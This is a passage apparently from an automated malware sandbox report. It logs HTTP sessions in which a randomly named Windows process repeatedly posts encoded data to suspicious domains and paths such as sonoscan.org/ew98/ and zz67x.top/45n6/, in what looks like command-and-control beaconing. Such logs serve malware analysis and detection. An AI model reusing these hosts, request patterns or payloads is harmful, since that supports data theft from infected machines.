                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              13 | 192.168.2.7 | 49989 | 13.248.169.48 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:31:53.622720957 CET | 607 | OUT | POST /ew98/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.sonoscan.org
                                                              Origin: http://www.sonoscan.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.sonoscan.org/ew98/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 61 43 6a 30 66 4a 4e 72 66 58 4f 71 79 46 7a 70 58 75 35 66 6c 30 34 79 38 36 78 56 51 72 6a 64 39 49 36 6b 5a 6c 55 6b 44 78 6d 6d 2f 37 36 56 73 70 41 78 63 48 54 4e 47 67 73 65 7a 63 4a 46 4b 50 6c 4a 61 4e 6f 58 37 78 69 67 58 74 59 6c 6b 77 66 75 78 45 65 6d 74 68 66 6b 44 42 65 73 79 67 47 65 37 45 46 36 78 2b 4c 32 35 4d 7a 32 45 47 39 35 35 6f 7a 5a 78 37 6d 2b 4e 6d 5a 64 51 57 58 6d 4d 51 32 76 63 32 79 56 68 2b 35 48 38 55 67 30 76 46 6f 57 46 7a 43 46 43 72 62 35 57 30 2f 4f 2b 30 71 4f 71 39 55 46 49 5a 47 5a 47 61 6e 76 4b 34 65 51 57 6b 63 6e 41 56 65 54 72 31 45 51 35 51 3d 3d
                                                              Data Ascii: ZtwlQ=OTBcpjr66R9YaCj0fJNrfXOqyFzpXu5fl04y86xVQrjd9I6kZlUkDxmm/76VspAxcHTNGgsezcJFKPlJaNoX7xigXtYlkwfuxEemthfkDBesygGe7EF6x+L25Mz2EG955ozZx7m+NmZdQWXmMQ2vc2yVh+5H8Ug0vFoWFzCFCrb5W0/O+0qOq9UFIZGZGanvK4eQWkcnAVeTr1EQ5Q==


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              14 | 192.168.2.7 | 49990 | 13.248.169.48 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:31:56.172172070 CET | 627 | OUT | POST /ew98/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.sonoscan.org
                                                              Origin: http://www.sonoscan.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.sonoscan.org/ew98/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 49 58 7a 30 4d 2b 68 72 55 58 4f 74 72 31 7a 70 41 2b 35 6c 6c 30 30 79 38 2f 52 46 54 5a 33 64 38 74 47 6b 59 6b 55 6b 41 78 6d 6d 33 62 36 55 78 5a 41 76 63 48 58 6a 47 69 49 65 7a 63 64 46 4b 4e 74 4a 62 2b 77 55 34 42 69 69 4d 39 59 6a 35 67 66 75 78 45 65 6d 74 6c 33 65 44 41 36 73 79 78 57 65 37 6c 46 35 34 65 4c 31 2b 4d 7a 32 56 57 39 39 35 6f 7a 72 78 2b 47 59 4e 6b 68 64 51 53 62 6d 4d 42 32 77 57 32 79 66 75 65 35 55 78 6b 35 51 67 6c 52 78 46 78 53 5a 43 35 62 79 54 43 2b 73 6b 57 6d 69 30 73 73 2b 4d 62 69 76 52 38 36 61 49 35 61 49 62 47 6f 47 66 69 37 35 6d 6e 6c 55 76 73 36 49 61 4b 50 44 50 4f 35 34 35 44 57 43 48 35 43 62 34 71 38 3d
                                                              Data Ascii: ZtwlQ=OTBcpjr66R9YIXz0M+hrUXOtr1zpA+5ll00y8/RFTZ3d8tGkYkUkAxmm3b6UxZAvcHXjGiIezcdFKNtJb+wU4BiiM9Yj5gfuxEemtl3eDA6syxWe7lF54eL1+Mz2VW995ozrx+GYNkhdQSbmMB2wW2yfue5Uxk5QglRxFxSZC5byTC+skWmi0ss+MbivR86aI5aIbGoGfi75mnlUvs6IaKPDPO545DWCH5Cb4q8=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              15 | 192.168.2.7 | 49991 | 13.248.169.48 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:31:58.717658043 CET | 1640 | OUT | POST /ew98/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.sonoscan.org
                                                              Origin: http://www.sonoscan.org
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.sonoscan.org/ew98/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 4f 54 42 63 70 6a 72 36 36 52 39 59 49 58 7a 30 4d 2b 68 72 55 58 4f 74 72 31 7a 70 41 2b 35 6c 6c 30 30 79 38 2f 52 46 54 5a 76 64 38 62 79 6b 5a 48 38 6b 42 78 6d 6d 72 4c 36 76 78 5a 42 71 63 47 7a 76 47 69 30 6b 7a 5a 5a 46 4c 6f 35 4a 50 62 63 55 6a 52 69 69 54 74 59 69 6b 77 66 42 78 45 4f 69 74 68 62 65 44 41 36 73 79 79 65 65 79 55 46 35 2b 65 4c 32 35 4d 7a 4d 45 47 39 52 35 6f 37 37 78 2b 43 75 4e 51 56 64 51 79 4c 6d 4f 7a 65 77 56 57 79 52 72 65 34 4a 78 6b 46 50 67 6c 4d 66 46 77 6d 6a 43 35 54 79 54 47 72 55 67 32 6d 62 6d 65 73 65 54 4a 36 68 62 39 36 61 50 70 65 6e 63 58 52 6a 61 43 50 37 6f 47 38 5a 70 5a 33 7a 41 70 48 47 55 74 34 73 36 56 4c 4c 61 34 69 39 72 39 51 4b 2f 2b 4f 59 42 43 72 5a 7a 48 38 47 57 73 32 79 64 77 78 53 64 6d 67 37 4a 4f 38 48 34 37 35 58 38 39 55 2b 75 57 55 54 42 44 33 76 37 44 48 75 6f 68 70 55 5a 4a 69 54 49 6d 7a 34 52 78 7a 2b 30 52 6c 4d 36 5a 52 75 69 35 79 4b 76 2b 2f 64 61 6b 68 66 58 58 76 31 2f 30 38 6a 32 53 69 54 77 75 4f 33 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=OTBcpjr66R9YIXz0M+hrUXOtr1zpA+5ll00y8/RFTZvd8bykZH8kBxmmrL6vxZBqcGzvGi0kzZZFLo5JPbcUjRiiTtYikwfBxEOithbeDA6syyeeyUF5+eL25MzMEG9R5o77x+CuNQVdQyLmOzewVWyRre4JxkFPglMfFwmjC5TyTGrUg2mbmeseTJ6hb96aPpencXRjaCP7oG8ZpZ3zApHGUt4s6VLLa4i9r9QK/+OYBCrZzH8GWs2ydwxSdmg7JO8H475X89U+uWUTBD3v7DHuohpUZJiTImz4Rxz+0RlM6ZRui5yKv+/dakhfXXv1/08j2SiTwuO3NEKXMWG5ENV6NpxIiN5AB8GgwNX/9K8dKe4FZNg6siS7dmLN7UkjWS8lqb+gPS3ge5V1gFNui7qSi0o1iLxB2XWe9e4Y95myuJFA3Ye1K5BcqJVsGuLiPctsvVGv5UhOj2Fz633EnB5jezrVx6GvJcdlkANpNFJ7O7jTF4x6fA1pc6LcmFTmFwbumYbBXcDpltQY4/sj9NrXjSYN8MiBtwN1qvbYJPJYfLHy69RsSHp0ivDwOCsR/2sWnCDHi3ggOs9btK50QMySEEw7bw5z+KtOnl/ooEvjlr63qkAvHGlulwlouLpxSwlBZZqN14TEw8F5JZeavHYuuZVsVXKpnSGhwNIXGDwawvk1TJM0DRQJffN+f7dIt+C7LI/2y161zQsXhmJSkR1XqWrYth2GEVImBAKw+MP9egB3OFA/XGcH+tuMaPo2bj4vkJbanxIWUHuZ+spOdf3Nnaa46RklDd3HbI2CJc1CiDX0z+3hG8boWsObfOmYWkal0qknR3B2T9xXpejt9DBxmOtVqwxZ5JW4ayNt6bX2Svbao3+73qGfI/2qb62U61MDlcz60HggysGslkI7wQOsT6Yn4foiFgDcMxJOwJvXHAfqbkvxrQat9aLia2v8cWN8igjzXCAqQ1KBprRnilk9dmcNqpI5QkLYKjiE3EYlK7 [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              16 | 192.168.2.7 | 49992 | 13.248.169.48 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:01.258341074 CET | 340 | OUT | GET /ew98/?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXK HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.sonoscan.org
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:32:01.910918951 CET | 410 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Tue, 12 Nov 2024 14:32:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 270
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 74 77 6c 51 3d 44 52 70 38 71 56 58 75 33 44 74 74 58 77 53 6a 64 4b 68 57 63 45 65 4d 6c 46 71 38 43 2b 68 6f 67 57 78 53 76 66 5a 34 64 2f 69 72 2f 34 47 4a 4f 31 6b 42 50 47 4b 6a 72 66 4f 48 2b 49 39 48 54 42 62 77 4d 78 49 71 36 4f 5a 6d 41 2b 74 30 55 38 63 70 73 77 76 6a 62 4f 38 6c 68 51 79 53 6c 33 36 65 6e 78 2f 61 64 55 62 78 6d 53 6d 63 34 6c 4a 65 77 37 54 63 35 71 66 65 44 77 68 79 74 64 79 75 2f 38 66 62 42 30 6b 37 26 5a 58 3d 47 32 4f 58 4b 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZtwlQ=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpswvjbO8lhQySl36enx/adUbxmSmc4lJew7Tc5qfeDwhytdyu/8fbB0k7&ZX=G2OXK"}</script></head></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              17 | 192.168.2.7 | 49993 | 38.47.232.194 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:07.011147022 CET | 598 | OUT | POST /45n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zz67x.top
                                                              Origin: http://www.zz67x.top
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.zz67x.top/45n6/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 51 68 37 42 79 57 48 32 37 45 61 37 55 6c 52 68 53 2f 4b 45 61 39 6d 56 49 7a 52 70 36 66 62 35 78 34 51 36 4d 63 58 35 71 34 67 58 36 78 43 32 54 30 48 74 5a 56 71 30 61 68 2f 59 4d 61 6c 79 39 34 64 4b 65 34 45 2b 70 2f 4c 72 52 41 4c 72 4e 79 51 4c 73 31 42 41 72 41 34 59 7a 6c 33 59 65 48 4f 69 49 45 48 34 71 78 65 51 4d 38 4b 5a 61 76 66 50 75 61 6a 34 53 52 39 73 58 72 74 62 54 57 62 56 64 78 2f 65 4c 68 69 71 69 78 43 42 47 62 33 52 33 37 69 61 76 58 34 76 71 52 44 4c 63 59 75 41 49 6b 34 2f 67 62 7a 6d 71 53 46 67 63 32 31 73 71 6d 55 4c 48 64 58 4b 2b 41 6e 71 78 66 33 6e 4c 62 34 44 4c 63 33 31 33 6b 46 6d 45 51 3d 3d
                                                              Data Ascii: ZtwlQ=Qh7ByWH27Ea7UlRhS/KEa9mVIzRp6fb5x4Q6McX5q4gX6xC2T0HtZVq0ah/YMaly94dKe4E+p/LrRALrNyQLs1BArA4Yzl3YeHOiIEH4qxeQM8KZavfPuaj4SR9sXrtbTWbVdx/eLhiqixCBGb3R37iavX4vqRDLcYuAIk4/gbzmqSFgc21sqmULHdXK+Anqxf3nLb4DLc313kFmEQ==
                                                              Nov 12, 2024 15:32:07.964400053 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:32:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              18 | 192.168.2.7 | 49994 | 38.47.232.194 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:09.562175035 CET | 618 | OUT | POST /45n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zz67x.top
                                                              Origin: http://www.zz67x.top
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 238
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.zz67x.top/45n6/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 51 68 37 42 79 57 48 32 37 45 61 37 56 45 68 68 58 63 69 45 62 64 6d 57 45 54 52 70 76 76 62 31 78 35 73 36 4d 64 53 6b 74 4d 4d 58 2f 6a 61 32 56 41 72 74 65 56 71 30 44 52 2f 5a 49 61 6c 35 39 34 68 43 65 36 51 2b 70 2f 50 72 52 41 62 72 4e 46 4d 49 74 6c 42 65 77 51 34 61 72 46 33 59 65 48 4f 69 49 45 69 76 71 78 47 51 4d 4d 36 5a 61 4f 66 4d 77 4b 6a 35 61 78 39 73 54 72 74 66 54 57 62 6e 64 77 69 37 4c 6c 53 71 69 77 79 42 48 4b 33 57 35 37 69 41 72 58 35 62 36 7a 71 47 47 35 47 6f 4f 46 67 46 6b 5a 7a 32 6d 45 45 43 47 55 35 41 30 33 73 77 44 66 7a 38 70 6d 36 66 7a 65 7a 2f 47 35 4d 69 55 72 53 66 36 32 6b 69 53 70 32 6b 68 33 78 49 2f 77 6a 4d 6d 62 48 66 6b 50 35 75 76 49 38 3d
                                                              Data Ascii: ZtwlQ=Qh7ByWH27Ea7VEhhXciEbdmWETRpvvb1x5s6MdSktMMX/ja2VArteVq0DR/ZIal594hCe6Q+p/PrRAbrNFMItlBewQ4arF3YeHOiIEivqxGQMM6ZaOfMwKj5ax9sTrtfTWbndwi7LlSqiwyBHK3W57iArX5b6zqGG5GoOFgFkZz2mEECGU5A03swDfz8pm6fzez/G5MiUrSf62kiSp2kh3xI/wjMmbHfkP5uvI8=
                                                              Nov 12, 2024 15:32:10.798329115 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:32:10 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              19 | 192.168.2.7 | 49995 | 38.47.232.194 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:12.108653069 CET | 1631 | OUT | POST /45n6/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.zz67x.top
                                                              Origin: http://www.zz67x.top
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 1250
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.zz67x.top/45n6/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 51 68 37 42 79 57 48 32 37 45 61 37 56 45 68 68 58 63 69 45 62 64 6d 57 45 54 52 70 76 76 62 31 78 35 73 36 4d 64 53 6b 74 4e 59 58 2f 77 53 32 54 58 2f 74 66 56 71 30 4c 78 2f 45 49 61 6c 6f 39 34 35 47 65 36 4d 41 70 39 48 72 44 7a 6a 72 4c 77 34 49 6e 6c 42 65 35 77 34 5a 7a 6c 33 33 65 47 69 75 49 45 79 76 71 78 47 51 4d 50 69 5a 54 2f 66 4d 33 36 6a 34 53 52 38 6a 58 72 74 37 54 53 33 33 64 77 58 4f 49 57 61 71 69 51 69 42 42 38 72 57 78 37 69 47 73 58 35 44 36 7a 33 47 47 35 61 6b 4f 46 56 69 6b 5a 37 32 69 6a 35 35 61 33 31 35 68 48 31 76 4e 75 44 36 6e 6d 53 44 71 6f 6e 39 4e 59 6f 72 5a 59 47 34 32 46 31 71 48 2b 36 68 7a 78 56 4b 7a 30 44 6d 6d 2b 72 56 31 66 64 73 31 64 77 43 41 6e 4d 39 5a 54 67 42 31 41 55 63 4a 69 76 42 6e 5a 65 6f 45 64 42 74 4e 33 47 4c 37 61 4f 39 4e 50 4c 44 4d 4a 7a 35 61 66 71 57 66 7a 6a 44 63 45 30 65 65 63 62 7a 61 58 34 4b 78 4e 58 58 66 6b 64 55 52 4b 59 41 58 43 63 51 4d 6d 33 5a 31 56 31 77 59 53 36 32 7a 78 32 64 71 76 6f 37 6b 78 6d 79 [TRUNCATED]
                                                              Data Ascii: ZtwlQ=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 [TRUNCATED]
                                                              Nov 12, 2024 15:32:13.051506042 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:32:12 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              20 | 192.168.2.7 | 49996 | 38.47.232.194 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:14.653965950 CET | 337 | OUT | GET /45n6/?ZX=G2OXK&ZtwlQ=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYyv3h68wNOsFyKAz31clbs/jf4McL8QfrvpP2aRWMeaeVzG2yiHAO/Jkyn HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Host: www.zz67x.top
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Nov 12, 2024 15:32:15.630985975 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Tue, 12 Nov 2024 14:32:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              21 | 192.168.2.7 | 49997 | 167.172.133.32 | 80 | 1396 | C:\Program Files (x86)\oGiJgomzZfTqFMSPchJBlOpNjzboNOwKQMrxdyBnapSnWhiANeXhZYEiEqxd\lOYqgVWsbtwCn.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 12, 2024 15:32:20.857873917 CET | 613 | OUT | POST /jlqg/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.omnibizlux.biz
                                                              Origin: http://www.omnibizlux.biz
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Length: 218
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Referer: http://www.omnibizlux.biz/jlqg/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                              Data Raw: 5a 74 77 6c 51 3d 78 62 59 4f 45 44 33 58 75 76 49 77 65 38 41 5a 66 47 66 6f 6e 68 5a 63 43 34 6b 34 54 39 73 4a 33 34 56 45 67 41 56 51 2f 58 71 79 64 63 56 6a 6f 4b 52 67 45 72 46 70 31 2f 53 68 62 37 68 4a 50 4a 54 42 68 68 2b 2f 56 41 63 6d 71 31 46 43 6c 62 4e 77 74 36 2b 56 70 47 48 56 57 76 7a 72 53 59 45 37 4e 44 6f 43 6e 43 77 37 73 77 70 5a 63 68 70 45 6b 7a 77 61 67 77 7a 4c 43 56 6b 70 49 72 61 4d 36 31 79 2f 74 31 5a 39 48 67 78 6b 6f 42 73 4b 2f 75 66 57 74 37 76 51 34 47 2b 68 71 50 56 75 6b 50 4a 5a 63 45 53 53 77 67 46 5a 4c 37 6f 68 6c 57 43 7a 43 6e 75 73 47 6f 78 70 4d 58 53 51 64 66 76 73 58 69 4b 4e 30 30 78 62 49 67 3d 3d
                                                              Data Ascii: ZtwlQ=xbYOED3XuvIwe8AZfGfonhZcC4k4T9sJ34VEgAVQ/XqydcVjoKRgErFp1/Shb7hJPJTBhh+/VAcmq1FClbNwt6+VpGHVWvzrSYE7NDoCnCw7swpZchpEkzwagwzLCVkpIraM61y/t1Z9HgxkoBsK/ufWt7vQ4G+hqPVukPJZcESSwgFZL7ohlWCzCnusGoxpMXSQdfvsXiKN00xbIg==
                                                              Nov 12, 2024 15:32:21.517307043 CET | 306 | IN | HTTP/1.1 404 Not Found
